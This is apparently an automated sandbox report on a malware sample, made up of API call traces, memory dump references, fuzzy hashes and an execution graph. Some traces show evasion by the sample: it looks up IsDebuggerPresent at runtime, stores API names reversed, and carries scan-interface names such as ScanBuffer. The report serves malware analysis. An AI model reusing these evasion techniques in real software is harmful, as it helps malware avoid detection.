                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F4,02AFAF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02AFAF33
                                                                                                                                                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,000000F4,02AFAF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02AFAF39
                                                                                                                                                                                                                                                                                                                                                                                                                          • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02AFAF5B
                                                                                                                                                                                                                                                                                                                                                                                                                          • MessageBoxA.USER32(00000000,?,?,00002010), ref: 02AFAF71
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 185507032-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 03557df2b197d212e52b2630cb0c14d63b313456e6251f26209a37eba1d12386
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d8e6d8d79c682b8e6374fd4d36e217530fbf20d86f429cb9b217dacf1eabb408
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 03557df2b197d212e52b2630cb0c14d63b313456e6251f26209a37eba1d12386
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EC111CB2584300BAD280EBE4CE85F9B77FDAB44B40F404916B754DB091DE79E9448B62
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02AFE625
                                                                                                                                                                                                                                                                                                                                                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02AFE641
                                                                                                                                                                                                                                                                                                                                                                                                                          • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02AFE67A
                                                                                                                                                                                                                                                                                                                                                                                                                          • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02AFE6F7
                                                                                                                                                                                                                                                                                                                                                                                                                          • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02AFE710
                                                                                                                                                                                                                                                                                                                                                                                                                          • VariantCopy.OLEAUT32(?,00000000), ref: 02AFE745
Memory Dump Source
• Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2af0000_x.jbxd
Similarity
• API ID: ArraySafe$BoundIndex$CopyCreateVariant
• String ID:
APIs
• RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02AF35BA
• RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02AF3609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02AF35ED
• RegCloseKey.ADVAPI32(?,02AF3610,00000000,?,00000004,00000000,02AF3609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02AF3603
Similarity
• API ID: CloseOpenQueryValue
• String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
APIs
• GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B082FC,?,?,00000000,00000000,?,02B08215,00000000,KernelBASE,00000000,00000000,02B0823C), ref: 02B082C1
• GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B082C7
• GetProcAddress.KERNEL32(?,?), ref: 02B082D9
Similarity
• API ID: AddressProc$HandleModule
• String ID: Kernel32$sserddAcorPteG
APIs
• GetThreadLocale.KERNEL32(?,00000000,02AFAAE7,?,?,00000000), ref: 02AFAA68
  • Part of subcall function 02AFA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02AFA7E2
• GetThreadLocale.KERNEL32(00000000,00000004,00000000,02AFAAE7,?,?,00000000), ref: 02AFAA98
• EnumCalendarInfoA.KERNEL32(Function_0000A99C,00000000,00000000,00000004), ref: 02AFAAA3
• GetThreadLocale.KERNEL32(00000000,00000003,00000000,02AFAAE7,?,?,00000000), ref: 02AFAAC1
• EnumCalendarInfoA.KERNEL32(Function_0000A9D8,00000000,00000000,00000003), ref: 02AFAACC
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4102113445-0
APIs
• GetThreadLocale.KERNEL32(?,00000000,02AFACD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02AFAB2F
  • Part of subcall function 02AFA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02AFA7E2
Strings
Memory Dump Source
• Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2af0000_x.jbxd
Similarity
• API ID: Locale$InfoThread
• String ID: eeee$ggg$yyyy
• API String ID: 4232894706-1253427255
APIs
• GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B0823C,?,?,00000000,?,02B07A7E,ntdll,00000000,00000000,02B07AC3,?,?,00000000), ref: 02B0820A
  • Part of subcall function 02B08274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B082FC,?,?,00000000,00000000,?,02B08215,00000000,KernelBASE,00000000,00000000,02B0823C), ref: 02B082C1
  • Part of subcall function 02B08274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B082C7
  • Part of subcall function 02B08274: GetProcAddress.KERNEL32(?,?), ref: 02B082D9
• GetModuleHandleA.KERNELBASE(?), ref: 02B0821E
Strings
Memory Dump Source
• Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2af0000_x.jbxd
Similarity
• API ID: HandleModule$AddressProc
• String ID: AeldnaHeludoMteG$KernelBASE
• API String ID: 1883125708-1952140341
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(KernelBase,?,02B0FAEB,UacInitialize,02B77380,02B1B7B8,OpenSession,02B77380,02B1B7B8,ScanBuffer,02B77380,02B1B7B8,ScanString,02B77380,02B1B7B8,Initialize), ref: 02B0F6EE
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02B0F700
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: IsDebuggerPresent$KernelBase
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1646373207-2367923768
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,02B1D10B,00000000,02B1D11E), ref: 02AFC47A
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02AFC48B
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1646373207-3712701948
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02AFE297
                                                                                                                                                                                                                                                                                                                                                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02AFE2B3
                                                                                                                                                                                                                                                                                                                                                                                                                          • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02AFE32A
                                                                                                                                                                                                                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 02AFE353
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 920484758-0
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02AFAD59
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02AFAD7D
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(02AF0000,?,00000105), ref: 02AFAD98
                                                                                                                                                                                                                                                                                                                                                                                                                          • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02AFAE2E
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3990497365-0
APIs
• VirtualQuery.KERNEL32(?,?,0000001C), ref: 02AFAD59
• GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02AFAD7D
• GetModuleFileNameA.KERNEL32(02AF0000,?,00000105), ref: 02AFAD98
• LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02AFAE2E
Memory Dump Source
• Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2af0000_x.jbxd
Similarity
• API ID: FileModuleName$LoadQueryStringVirtual
• String ID:
• API String ID: 3990497365-0
Memory Dump Source
• Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2af0000_x.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02AF95DA), ref: 02AF9572
• GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02AF95DA), ref: 02AF9578
Strings
Memory Dump Source
• Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2af0000_x.jbxd
Similarity
• API ID: DateFormatLocaleThread
• String ID: yyyy
• API String ID: 3303714858-3145165042
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B0823C,?,?,00000000,?,02B07A7E,ntdll,00000000,00000000,02B07AC3,?,?,00000000), ref: 02B0820A
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B081CC: GetModuleHandleA.KERNELBASE(?), ref: 02B0821E
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B082FC,?,?,00000000,00000000,?,02B08215,00000000,KernelBASE,00000000,00000000,02B0823C), ref: 02B082C1
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B082C7
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08274: GetProcAddress.KERNEL32(?,?), ref: 02B082D9
                                                                                                                                                                                                                                                                                                                                                                                                                          • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02B083C2), ref: 02B083A4
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: FlushInstructionCache$Kernel32
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: AllocValue
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: @m
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B0AF58
                                                                                                                                                                                                                                                                                                                                                                                                                          • IsBadWritePtr.KERNEL32(?,00000004), ref: 02B0AF88
                                                                                                                                                                                                                                                                                                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000008), ref: 02B0AFA7
                                                                                                                                                                                                                                                                                                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B0AFB3
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Read$Write
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:

Execution Graph

Execution Coverage:3%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:4.6%
Total number of Nodes:1240
Total number of Limit Nodes:23
13403->13408 13403->13418 13404->13407 13405 41734b _memset __crtGetStringTypeA_stat 13416 417389 LCMapStringA 13405->13416 13405->13423 13406->13418 13407->13386 13411 4172a3 13408->13411 13414 417281 WideCharToMultiByte 13408->13414 13409->13403 13413 40b84d _malloc 62 API calls 13409->13413 13410->13405 13412 40b84d _malloc 62 API calls 13410->13412 13415 4147ae __freea 62 API calls 13411->13415 13412->13405 13413->13403 13414->13411 13415->13418 13419 4173a5 13416->13419 13420 4173a9 13416->13420 13418->13399 13422 4147ae __freea 62 API calls 13419->13422 13421 417a69 ___convertcp 69 API calls 13420->13421 13421->13419 13422->13423 13423->13393 13423->13397 13424->13095 13426 41358c 13425->13426 13427 41046e __encode_pointer 6 API calls 13426->13427 13428 4135a4 13426->13428 13427->13426 13428->12554 13432 40d281 13429->13432 13431 40d2ca 13431->12556 13433 40d28d __sopen_helper 13432->13433 13440 40e806 13433->13440 13439 40d2ae __sopen_helper 13439->13431 13441 40d6e0 __lock 62 API calls 13440->13441 13442 40d292 13441->13442 13443 40d196 13442->13443 13444 4104e9 __decode_pointer 6 API calls 13443->13444 13445 40d1aa 13444->13445 13446 4104e9 __decode_pointer 6 API calls 13445->13446 13447 40d1ba 13446->13447 13457 40d23d 13447->13457 13463 40e56a 13447->13463 13449 40d224 13450 41046e __encode_pointer 6 API calls 13449->13450 13451 40d232 13450->13451 13454 41046e __encode_pointer 6 API calls 13451->13454 13452 40d1fc 13456 411d06 __realloc_crt 72 API calls 13452->13456 13452->13457 13458 40d212 13452->13458 13453 40d1d8 13453->13449 13453->13452 13476 411d06 13453->13476 13454->13457 13456->13458 13460 40d2b7 13457->13460 13458->13457 13459 41046e __encode_pointer 6 API calls 13458->13459 13459->13449 13525 40e80f 13460->13525 13464 40e576 __sopen_helper 13463->13464 13465 40e5a3 13464->13465 13466 40e586 13464->13466 13468 40e5e4 HeapSize 13465->13468 13470 40d6e0 __lock 62 API calls 13465->13470 13467 40bfc1 __read_nolock 62 API calls 13466->13467 13469 
40e58b 13467->13469 13473 40e59b __sopen_helper 13468->13473 13471 40e744 __read_nolock 6 API calls 13469->13471 13472 40e5b3 ___sbh_find_block 13470->13472 13471->13473 13481 40e604 13472->13481 13473->13453 13478 411d0f 13476->13478 13479 411d4e 13478->13479 13480 411d2f Sleep 13478->13480 13485 40e34f 13478->13485 13479->13452 13480->13478 13484 40d606 LeaveCriticalSection 13481->13484 13483 40e5df 13483->13468 13483->13473 13484->13483 13486 40e35b __sopen_helper 13485->13486 13487 40e370 13486->13487 13488 40e362 13486->13488 13490 40e383 13487->13490 13491 40e377 13487->13491 13489 40b84d _malloc 62 API calls 13488->13489 13506 40e36a __dosmaperr __sopen_helper 13489->13506 13498 40e4f5 13490->13498 13520 40e390 _realloc ___sbh_resize_block ___sbh_find_block 13490->13520 13492 40b6b5 ___freetlocinfo 62 API calls 13491->13492 13492->13506 13493 40e528 13494 40d2e3 _realloc 6 API calls 13493->13494 13497 40e52e 13494->13497 13495 40d6e0 __lock 62 API calls 13495->13520 13496 40e4fa HeapReAlloc 13496->13498 13496->13506 13499 40bfc1 __read_nolock 62 API calls 13497->13499 13498->13493 13498->13496 13500 40e54c 13498->13500 13501 40d2e3 _realloc 6 API calls 13498->13501 13503 40e542 13498->13503 13499->13506 13502 40bfc1 __read_nolock 62 API calls 13500->13502 13500->13506 13501->13498 13504 40e555 GetLastError 13502->13504 13507 40bfc1 __read_nolock 62 API calls 13503->13507 13504->13506 13506->13478 13509 40e4c3 13507->13509 13508 40e41b HeapAlloc 13508->13520 13509->13506 13511 40e4c8 GetLastError 13509->13511 13510 40e470 HeapReAlloc 13510->13520 13511->13506 13512 40def2 ___sbh_alloc_block 5 API calls 13512->13520 13513 40e4db 13513->13506 13516 40bfc1 __read_nolock 62 API calls 13513->13516 13514 40d2e3 _realloc 6 API calls 13514->13520 13515 40d743 __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 13515->13520 13517 40e4e8 13516->13517 13517->13504 13517->13506 13518 40e4be 13519 40bfc1 __read_nolock 62 API calls 13518->13519 13519->13509 
13520->13493 13520->13495 13520->13506 13520->13508 13520->13510 13520->13512 13520->13513 13520->13514 13520->13515 13520->13518 13521 40e493 13520->13521 13524 40d606 LeaveCriticalSection 13521->13524 13523 40e49a 13523->13520 13524->13523 13528 40d606 LeaveCriticalSection 13525->13528 13527 40d2bc 13527->13439 13528->13527 13532 40b9aa __sopen_helper _strnlen 13529->13532 13530 40b9b8 13531 40bfc1 __read_nolock 62 API calls 13530->13531 13533 40b9bd 13531->13533 13532->13530 13535 40b9ec 13532->13535 13534 40e744 __read_nolock 6 API calls 13533->13534 13539 40b9cd __sopen_helper 13534->13539 13536 40d6e0 __lock 62 API calls 13535->13536 13537 40b9f3 13536->13537 13586 40b917 13537->13586 13539->12560 13543 4017cc _realloc 13542->13543 13543->12564 13546 40af70 13544->13546 13545 40b84d _malloc 62 API calls 13545->13546 13546->13545 13547 40af8a 13546->13547 13548 40d2e3 _realloc 6 API calls 13546->13548 13551 40af8c std::bad_alloc::bad_alloc 13546->13551 13547->12570 13548->13546 13549 40afb2 13800 40af49 13549->13800 13551->13549 13553 40d2bd __cinit 73 API calls 13551->13553 13553->13549 13555 40afca 13557 401903 lstrlenA 13556->13557 13558 4018fc 13556->13558 13812 4017e0 13557->13812 13558->12592 13561 401940 GetLastError 13563 40194b MultiByteToWideChar 13561->13563 13565 40198d 13561->13565 13562 401996 13562->12592 13564 4017e0 77 API calls 13563->13564 13566 401970 MultiByteToWideChar 13564->13566 13565->13562 13828 401030 GetLastError 13565->13828 13566->13565 13569 40af66 74 API calls 13568->13569 13570 40187c 13569->13570 13571 401885 #2 13570->13571 13572 4018a4 13570->13572 13571->13572 13572->12594 13574 40231a #24 13573->13574 13574->12601 13576 4019aa InterlockedDecrement 13575->13576 13581 4019df #9 13575->13581 13577 4019b8 13576->13577 13576->13581 13578 4019c2 #6 13577->13578 13579 4019c9 13577->13579 13577->13581 13578->13579 13837 40aec0 13579->13837 13581->12609 13583 401571 13582->13583 13585 401582 13582->13585 13843 40afe0 13583->13843 
13585->12572 13587 40b92c 13586->13587 13588 40b930 13586->13588 13592 40ba18 13587->13592 13588->13587 13590 40b942 _strlen 13588->13590 13595 40eeab 13588->13595 13590->13587 13605 40edfb 13590->13605 13799 40d606 LeaveCriticalSection 13592->13799 13594 40ba1f 13594->13539 13598 40eec6 13595->13598 13603 40ef2b 13595->13603 13596 40eecc WideCharToMultiByte 13596->13598 13596->13603 13597 411cba __calloc_crt 62 API calls 13597->13598 13598->13596 13598->13597 13599 40eeef WideCharToMultiByte 13598->13599 13598->13603 13604 40b6b5 ___freetlocinfo 62 API calls 13598->13604 13608 414d44 13598->13608 13599->13598 13600 40ef37 13599->13600 13601 40b6b5 ___freetlocinfo 62 API calls 13600->13601 13601->13603 13603->13590 13604->13598 13700 40ed0d 13605->13700 13609 414d76 13608->13609 13610 414d59 13608->13610 13612 414dd4 13609->13612 13654 417e7e 13609->13654 13611 40bfc1 __read_nolock 62 API calls 13610->13611 13613 414d5e 13611->13613 13614 40bfc1 __read_nolock 62 API calls 13612->13614 13616 40e744 __read_nolock 6 API calls 13613->13616 13634 414d6e 13614->13634 13616->13634 13618 414db5 13620 414e12 13618->13620 13621 414de7 13618->13621 13622 414dcb 13618->13622 13620->13634 13665 414c98 13620->13665 13624 411c75 __malloc_crt 62 API calls 13621->13624 13621->13634 13625 40eeab ___wtomb_environ 119 API calls 13622->13625 13627 414df7 13624->13627 13628 414dd0 13625->13628 13627->13620 13627->13634 13635 411c75 __malloc_crt 62 API calls 13627->13635 13628->13612 13628->13620 13629 414e8f 13630 414f7a 13629->13630 13636 414e98 13629->13636 13633 40b6b5 ___freetlocinfo 62 API calls 13630->13633 13631 414e41 13632 40b6b5 ___freetlocinfo 62 API calls 13631->13632 13639 414e4b 13632->13639 13633->13634 13634->13598 13635->13620 13636->13634 13637 411d54 __recalloc_crt 73 API calls 13636->13637 13640 414e51 _strlen 13637->13640 13638 414f5e 13638->13634 13642 40b6b5 ___freetlocinfo 62 API calls 13638->13642 13639->13640 13669 411d54 13639->13669 13640->13634 13640->13638 
